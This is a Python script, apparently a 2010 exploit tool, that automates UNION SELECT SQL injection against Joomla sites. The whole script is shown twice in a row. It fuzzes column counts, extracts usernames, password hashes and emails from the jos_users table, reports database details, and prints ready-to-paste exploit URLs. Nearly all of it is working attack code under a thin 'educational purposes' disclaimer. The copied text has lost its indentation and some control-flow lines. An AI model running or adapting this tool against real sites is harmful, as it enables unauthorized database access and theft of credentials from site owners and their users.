# Automated Joomla SQL Injection Exploiter
# by Valentin Hoebel ([email protected])
# Version 1.0 (23th May 2010)
# This tool is based on my column fuzzer
# About the tool
# ----------------------------------------------------------------------------------
# Features:
#- Check if URL is reachable
#- Fuzz amount of columns (needed for UNION SELECT attack)
#- Show a sample exploitation URL for pasting into the browser
#- Showing the Joomla users from the table jos_users (with password hashes)
#- Display current database, db user and db version
# The Automated Joomla SQL Injection Exploiter is able to
# exploit most of the SQL injection vulnerabilities which were ever
# fdiscovered for Joomla or it's components, modules and plugins.
# Simply hand over a vulnerable URL to this tool and receive the
# admin login data of the vulnerable Joomla installation.
# With this tool it is no longer necessary to write new exploits for new
# Joomla (components/modules/plugins) vulnerabilities!
# Usage example:
# python joomla_sqli_sploiter.py - u "http://target/index.php?option=com_component?id=1"
# The tool tries to exploit SQL injection vulnerabilities by using UNION SELECT. Therefore
# it is necessary to fuzz the number of columns.
# If this is successfull, the tool crafts a SQL injection URL for reading out the Joomla user table.
# Since most of the stuff is dynamic this tool can be enhanced easely to do also other things.
# Feel free to use, modify, distribute and share this code as you like! Power to teh cows!
# This tool war written for educational purposes only. I am not responsible for any damage
# you might cause using this tool. Know and respect your local laws!
# Only use this tool on websites you are allowed to test
# Greetz && THX
# ----------------------------------------------------------------------------------
# Special greetings to cr4wl3r (you know why !)
# Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn (especially to /JosS) and the Packet Storm staff!
# Thanks osvdb staff + moderators for your daily work! There are many people who appreciate what you are doing!
# Power to the cows!
import sys, re, urllib, urllib2, string
from urllib2 import Request, urlopen, URLError, HTTPError
# Define the max. amounts for trying
max_columns = 100
# Prints usage
def print_usage():
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
print " by Valentin Hoebel ([email protected])"
print ""
print " Exploits almost every SQL injection vulnerability which was ever discovered"
print " for Joomla and it's components/modules/plugins. It works also for feature(new)"
print " vulnerabilities, so no new exploits are needed!"
print ""
print " Simply give this tool the vulnerable URL and receive the Joomla user table!"
print ""
print " Usage:"
print " -u <URL> (e.g. -u \"http://target/index.php?option=com_vulnerable&katid=1\")"
print " --help (displays this text)"
print ""
print ""
print " Features:"
print " - Check if URL is reachable"
print " - Fuzz amount of columns (needed for UNION SELECT attack)"
print " - Show a sample exploitation URL for pasting into the browser"
print " - Showing the Joomla users from the table jos_users (with password hashes)"
print " - Display current database, db user and db version"
print ""
print " For educational purposes only! I am not responsible if you cause any damage!"
print " Only use this tool on websites which you may test, e.g. for penetration testing."
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print ""
#Prints banner
def print_banner():
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
print " by Valentin Hoebel ([email protected])"
print ""
print " For educational purposes only! I am not responsible if you cause any damage!"
print " Only use this tool on websites which you may test, e.g. for penetration testing."
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
# Testing if URL is reachable, with error handling
def test_url():
print ">> Checking if connection can be established..."
response = urllib2.urlopen(provided_url)
except HTTPError, e:
print ">> The connection could not be established."
print ">> Error code: ", e.code
print ">> Exiting now!"
print ""
except URLError, e:
print ">> The connection could not be established."
print ">> Reason: ", e.reason
print ">> Exiting now!"
print ""
valid_target = 1
print ">> Connected to target! URL seems to be valid."
print ""
# Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
def find_columns():
# Define some important variables and make the script a little bit dynamic
number_of_columns = 1
column_finder_url_string = "+AND+1=2+UNION+SELECT+"
column_finder_url_message = "0x503077337220743020743368206330777321"
column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
column_finder_url_terminator = "+from+jos_users--"
column_finder_url_terminator_2 = "--"
next_column = ","
column_finder_url_sample_2 = "concat_ws(0x3b,user(),database(),version())"
column_finder_url_sample_3 = "concat_ws(0x3b,0x50307733722074302074336820633077 7321,user(),database(),version(),0x503077337220743 020743368206330777321)"
column_finder_url_sample = "concat_ws(0x3b,0x50307733722074302074336820633077 7321,id,name,username,password,email,usertype,0x50 3077337220743020743368206330777321)"
# Craft the final URL to check
final_check_url = provided_url+column_finder_url_string+column_finder_url_message
print ">> Assuming that your provided URL is vulnerable."
print ">> Trying to find the correct number of columns... (this may take a while)"
for x in xrange(1, max_columns):
# Visit website and store response source code of site
final_check_url2 = final_check_url+column_finder_url_terminator
response = urllib2.urlopen(final_check_url2)
html = response.read()
find_our_injected_string = re.findall(column_finder_url_message_plain, html)
# When the correct amount was found we display the information and exit
if len(find_our_injected_string) != 0:
print ">> Correct number of columns found!"
print ">> Amount: ", number_of_columns
# Offer to display a sample exploitation URL for pasting into the browser
print ""
user_reply = str(raw_input(">> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
# Print a sample URL for exploiting and replace test string with some useful stuff
print ""
final_check_url3 = final_check_url+column_finder_url_terminator_2
print string.replace(final_check_url3, column_finder_url_message, column_finder_url_sample_2)
print ""
print ">> Simply copy and paste this link into your browser Moving on..."
print ">> Viewing a sample exploitation URL was skipped!"
# Craft our exploit query
malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
print ""
print ">> Now assuming that this is a Joomla installation."
print ">> Trying to fetch the first user of the Joomla user table..."
# Receive the first user of the Joomla user table
response = urllib2.urlopen(malicious_query)
html = response.read()
get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!")
get_secret_data += 18
new_html = html[get_secret_data :]
new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!")
new_html_2 = new_html[:new_get_secret_data]
# Data was received, now format and display it
formatted_output = str.split(new_html_2, ";")
print "ID: ", formatted_output[1:2]
print "Name: ", formatted_output[2:3], "Username: ", formatted_output[3:4]
print "Password Hash: ", formatted_output[4:5]
print "E-Mail Address: ", formatted_output[5:6], "User status: ", formatted_output[6:7]
# Offer to display all entries of the Joomla user table
print ""
user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
print ""
print "-------------------------------------------------------------"
print str.split(new_html, ";")
print "-------------------------------------------------------------"
print "The seperator for the single entries is: ", column_finder_url_message_plain
print "So it is this pattern: seperator id;name;username;password;email address;user status seperator"
print "I know, formatting is bad, but this will be improved soon."
print ">> Viewing the Joomla user table output was skipped!"
# Offer to display current database, user and MySQL version
print ""
user_reply = str(raw_input(">> Do you want to display the current database, database user and MySQL version? (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
# Crafting the final URL
final_check_url4 = final_check_url+column_finder_url_terminator_2
informative_query = string.replace(final_check_url4, column_finder_url_message, column_finder_url_sample_3)
# Getting the data
response4 = urllib2.urlopen(informative_query)
html4 = response4.read()
# Now extract the interesting information
get_secret_data = string.find(html4, "P0w3r t0 t3h c0ws!")
get_secret_data += 18
new_html4 = html4[get_secret_data :]
new_get_secret_data4 = string.find(new_html4, "P0w3r t0 t3h c0ws!")
new_html_5 = new_html4[:new_get_secret_data4]
# Data was received, now format and display it
formatted_output = str.split(new_html_5, ";")
print "MySQL Database User: ", formatted_output[1:2]
print "MySQL Database: ", formatted_output[2:3]
print "MySQL Version: ", formatted_output[3:4]
print "That's it. Bye!"
print ""
print ""
print ">> Viewing the informative data was skipped!"
print "That's it. Bye!"
print ""
print ""
# Increment counter var by one
number_of_columns += 1
#Add a new column to the URL
final_check_url += next_column
final_check_url += column_finder_url_message
# If fuzzing is not successfull print this message
print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
print "Bye!"
print ""
print ""
# Checking if argument was provided
if len(sys.argv) <=1:
for arg in sys.argv:
# Checking if help was called
if arg == "--help":
# Checking if URL was provided, if yes -> go!
if arg == "-u":
provided_url = sys.argv[2]
# At first we test if we can actually reach the provided URL
# Now start with finding the correct amount of columns
### EOF ### [/php]
# Automated Joomla SQL Injection Exploiter
# by Valentin Hoebel ([email protected])
# Version 1.0 (23th May 2010)
# This tool is based on my column fuzzer
# About the tool
# ----------------------------------------------------------------------------------
# Features:
#- Check if URL is reachable
#- Fuzz amount of columns (needed for UNION SELECT attack)
#- Show a sample exploitation URL for pasting into the browser
#- Showing the Joomla users from the table jos_users (with password hashes)
#- Display current database, db user and db version
# The Automated Joomla SQL Injection Exploiter is able to
# exploit most of the SQL injection vulnerabilities which were ever
# fdiscovered for Joomla or it's components, modules and plugins.
# Simply hand over a vulnerable URL to this tool and receive the
# admin login data of the vulnerable Joomla installation.
# With this tool it is no longer necessary to write new exploits for new
# Joomla (components/modules/plugins) vulnerabilities!
# Usage example:
# python joomla_sqli_sploiter.py - u "http://target/index.php?option=com_component?id=1"
# The tool tries to exploit SQL injection vulnerabilities by using UNION SELECT. Therefore
# it is necessary to fuzz the number of columns.
# If this is successfull, the tool crafts a SQL injection URL for reading out the Joomla user table.
# Since most of the stuff is dynamic this tool can be enhanced easely to do also other things.
# Feel free to use, modify, distribute and share this code as you like! Power to teh cows!
# This tool war written for educational purposes only. I am not responsible for any damage
# you might cause using this tool. Know and respect your local laws!
# Only use this tool on websites you are allowed to test
# Greetz && THX
# ----------------------------------------------------------------------------------
# Special greetings to cr4wl3r (you know why !)
# Greetz && THX to: inj3ct0r, Exploit DB team, hack0wn (especially to /JosS) and the Packet Storm staff!
# Thanks osvdb staff + moderators for your daily work! There are many people who appreciate what you are doing!
# Power to the cows!
import sys, re, urllib, urllib2, string
from urllib2 import Request, urlopen, URLError, HTTPError
# Define the max. amounts for trying
max_columns = 100
# Prints usage
def print_usage():
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
print " by Valentin Hoebel ([email protected])"
print ""
print " Exploits almost every SQL injection vulnerability which was ever discovered"
print " for Joomla and it's components/modules/plugins. It works also for feature(new)"
print " vulnerabilities, so no new exploits are needed!"
print ""
print " Simply give this tool the vulnerable URL and receive the Joomla user table!"
print ""
print " Usage:"
print " -u <URL> (e.g. -u \"http://target/index.php?option=com_vulnerable&katid=1\")"
print " --help (displays this text)"
print ""
print ""
print " Features:"
print " - Check if URL is reachable"
print " - Fuzz amount of columns (needed for UNION SELECT attack)"
print " - Show a sample exploitation URL for pasting into the browser"
print " - Showing the Joomla users from the table jos_users (with password hashes)"
print " - Display current database, db user and db version"
print ""
print " For educational purposes only! I am not responsible if you cause any damage!"
print " Only use this tool on websites which you may test, e.g. for penetration testing."
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print ""
#Prints banner
def print_banner():
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
print " Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)"
print " by Valentin Hoebel ([email protected])"
print ""
print " For educational purposes only! I am not responsible if you cause any damage!"
print " Only use this tool on websites which you may test, e.g. for penetration testing."
print ""
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print ""
# Testing if URL is reachable, with error handling
def test_url():
print ">> Checking if connection can be established..."
response = urllib2.urlopen(provided_url)
except HTTPError, e:
print ">> The connection could not be established."
print ">> Error code: ", e.code
print ">> Exiting now!"
print ""
except URLError, e:
print ">> The connection could not be established."
print ">> Reason: ", e.reason
print ">> Exiting now!"
print ""
valid_target = 1
print ">> Connected to target! URL seems to be valid."
print ""
# Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
def find_columns():
# Define some important variables and make the script a little bit dynamic
number_of_columns = 1
column_finder_url_string = "+AND+1=2+UNION+SELECT+"
column_finder_url_message = "0x503077337220743020743368206330777321"
column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
column_finder_url_terminator = "+from+jos_users--"
column_finder_url_terminator_2 = "--"
next_column = ","
column_finder_url_sample_2 = "concat_ws(0x3b,user(),database(),version())"
column_finder_url_sample_3 = "concat_ws(0x3b,0x50307733722074302074336820633077 7321,user(),database(),version(),0x503077337220743 020743368206330777321)"
column_finder_url_sample = "concat_ws(0x3b,0x50307733722074302074336820633077 7321,id,name,username,password,email,usertype,0x50 3077337220743020743368206330777321)"
# Craft the final URL to check
final_check_url = provided_url+column_finder_url_string+column_finder_url_message
print ">> Assuming that your provided URL is vulnerable."
print ">> Trying to find the correct number of columns... (this may take a while)"
for x in xrange(1, max_columns):
# Visit website and store response source code of site
final_check_url2 = final_check_url+column_finder_url_terminator
response = urllib2.urlopen(final_check_url2)
html = response.read()
find_our_injected_string = re.findall(column_finder_url_message_plain, html)
# When the correct amount was found we display the information and exit
if len(find_our_injected_string) != 0:
print ">> Correct number of columns found!"
print ">> Amount: ", number_of_columns
# Offer to display a sample exploitation URL for pasting into the browser
print ""
user_reply = str(raw_input(">> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
# Print a sample URL for exploiting and replace test string with some useful stuff
print ""
final_check_url3 = final_check_url+column_finder_url_terminator_2
print string.replace(final_check_url3, column_finder_url_message, column_finder_url_sample_2)
print ""
print ">> Simply copy and paste this link into your browser Moving on..."
print ">> Viewing a sample exploitation URL was skipped!"
# Craft our exploit query
malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
print ""
print ">> Now assuming that this is a Joomla installation."
print ">> Trying to fetch the first user of the Joomla user table..."
# Receive the first user of the Joomla user table
response = urllib2.urlopen(malicious_query)
html = response.read()
get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!")
get_secret_data += 18
new_html = html[get_secret_data :]
new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!")
new_html_2 = new_html[:new_get_secret_data]
# Data was received, now format and display it
formatted_output = str.split(new_html_2, ";")
print "ID: ", formatted_output[1:2]
print "Name: ", formatted_output[2:3], "Username: ", formatted_output[3:4]
print "Password Hash: ", formatted_output[4:5]
print "E-Mail Address: ", formatted_output[5:6], "User status: ", formatted_output[6:7]
# Offer to display all entries of the Joomla user table
print ""
user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
print ""
print "-------------------------------------------------------------"
print str.split(new_html, ";")
print "-------------------------------------------------------------"
print "The seperator for the single entries is: ", column_finder_url_message_plain
print "So it is this pattern: seperator id;name;username;password;email address;user status seperator"
print "I know, formatting is bad, but this will be improved soon."
print ">> Viewing the Joomla user table output was skipped!"
# Offer to display current database, user and MySQL version
print ""
user_reply = str(raw_input(">> Do you want to display the current database, database user and MySQL version? (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
# Crafting the final URL
final_check_url4 = final_check_url+column_finder_url_terminator_2
informative_query = string.replace(final_check_url4, column_finder_url_message, column_finder_url_sample_3)
# Getting the data
response4 = urllib2.urlopen(informative_query)
html4 = response4.read()
# Now extract the interesting information
get_secret_data = string.find(html4, "P0w3r t0 t3h c0ws!")
get_secret_data += 18
new_html4 = html4[get_secret_data :]
new_get_secret_data4 = string.find(new_html4, "P0w3r t0 t3h c0ws!")
new_html_5 = new_html4[:new_get_secret_data4]
# Data was received, now format and display it
formatted_output = str.split(new_html_5, ";")
print "MySQL Database User: ", formatted_output[1:2]
print "MySQL Database: ", formatted_output[2:3]
print "MySQL Version: ", formatted_output[3:4]
print "That's it. Bye!"
print ""
print ""
print ">> Viewing the informative data was skipped!"
print "That's it. Bye!"
print ""
print ""
# Increment counter var by one
number_of_columns += 1
#Add a new column to the URL
final_check_url += next_column
final_check_url += column_finder_url_message
# If fuzzing is not successfull print this message
print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
print "Bye!"
print ""
print ""
# Checking if argument was provided
if len(sys.argv) <=1:
for arg in sys.argv:
# Checking if help was called
if arg == "--help":
# Checking if URL was provided, if yes -> go!
if arg == "-u":
provided_url = sys.argv[2]
# At first we test if we can actually reach the provided URL
# Now start with finding the correct amount of columns
### EOF ### [/php]